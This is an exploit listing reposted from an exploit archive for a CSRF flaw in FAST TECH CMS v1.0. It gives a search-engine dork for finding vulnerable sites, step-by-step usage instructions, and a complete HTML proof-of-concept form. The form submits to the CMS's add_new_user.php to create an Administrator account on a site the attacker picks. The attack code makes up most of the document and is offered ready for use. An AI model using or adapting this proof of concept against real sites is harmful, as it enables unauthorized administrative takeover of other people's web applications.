Share
## https://sploitus.com/exploit?id=PACKETSTORM:174306
====================================================================================================================================  
| # Title : FAST TECH CMS v1.0 CSRF Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 73.0.1(32-bit) |   
| # Vendor : http://www.fasttechtechnologies.in/ |   
| # Dork : Designed & Developed by FAST TECH TECHNOLOGIES SERVICES PVT LTD . All rights reserved. |  
====================================================================================================================================  
  
poc :  
  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] The following html code create a new admin .  
  
[+] Go to the line 5.  
  
[+] Set the target site link Save changes and apply .   
  
[+] infected file : /admin/add_new_user.php  
  
[+] save code as poc.html .  
  
<!DOCTYPE html>  
<html xmlns="http://www.w3.org/1999/xhtml">  
<head profile="http://www.w3.org/2005/10/profile">  
<script data-ad-client="ca-pub-6966557515756083" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>  
<form action="https://127.0.0.1/repairthikanacom/admin/add_new_user.php" method="post" name="newuserform" enctype="multipart/form-data">  
<div class="form-group">  
<label>Name</label>  
<input type="text" class="form-control" id="name" name="name" placeholder="Enter Name ..." required>  
</div>  
<div class="form-group">  
<label>User Name</label>  
<input type="text" class="form-control" id="username" name="username" placeholder="Enter User Name ..." required>  
</div>  
  
<div class="form-group">  
<label>Password</label>  
<input type="password" class="form-control" id="password" name="password" placeholder="Enter Password ..." required>  
</div>  
  
  
<div class="form-group">  
<label>Confirm Password</label>  
<input type="password" class="form-control" id="confirmpassword" name="confirmpassword" placeholder="Enter Confirm Password ..." required>  
</div>  
  
  
<div class="form-group">  
<label>User Type</label>  
<select class="form-control" id="usertype" name="usertype" required>  
<option>Select Type</option>  
<option value="A">Administrator</option>  
<option value="R">Retail</option>  
  
</select>  
</div>  
  
<div class="form-group">  
<label>Email-Id</label>  
<input type="text" class="form-control" id="emailid" name="emailid" placeholder="Enter Email-Id ..." required>  
</div>  
  
<div class="box-footer">  
<button type="submit" class="btn btn-primary" name="submit">Submit</button>  
</div>  
</form>  
</div>  
  
</div>  
  
Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |  
=======================================================================================================================================